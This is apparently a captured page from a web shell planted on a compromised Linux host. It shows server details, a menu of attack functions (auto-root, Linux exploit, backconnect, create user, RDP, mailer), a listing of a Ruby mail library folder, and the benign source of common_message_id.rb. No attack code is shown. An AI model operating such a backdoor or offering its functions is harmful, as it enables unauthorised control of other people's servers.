Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
vendor_ruby /
mail /
fields /
common /
[ HOME SHELL ]
Name
Size
Permission
Action
address_container.rb
234
B
-rw-r--r--
common_address.rb
4.45
KB
-rw-r--r--
common_date.rb
666
B
-rw-r--r--
common_field.rb
857
B
-rw-r--r--
common_message_id.rb
952
B
-rw-r--r--
parameter_hash.rb
1.71
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : common_message_id.rb
# encoding: utf-8 # frozen_string_literal: true module Mail module CommonMessageId # :nodoc: def element @element ||= Mail::MessageIdsElement.new(value) unless Utilities.blank?(value) end def parse(val = value) unless Utilities.blank?(val) @element = Mail::MessageIdsElement.new(val) else nil end end def message_id element.message_id if element end def message_ids element.message_ids if element end def default return nil unless message_ids if message_ids.length == 1 message_ids[0] else message_ids end end private def do_encode(field_name) %Q{#{field_name}: #{formated_message_ids("\r\n ")}\r\n} end def do_decode formated_message_ids(' ') end def formated_message_ids(join) message_ids.map{ |m| "<#{m}>" }.join(join) if message_ids end end end
Close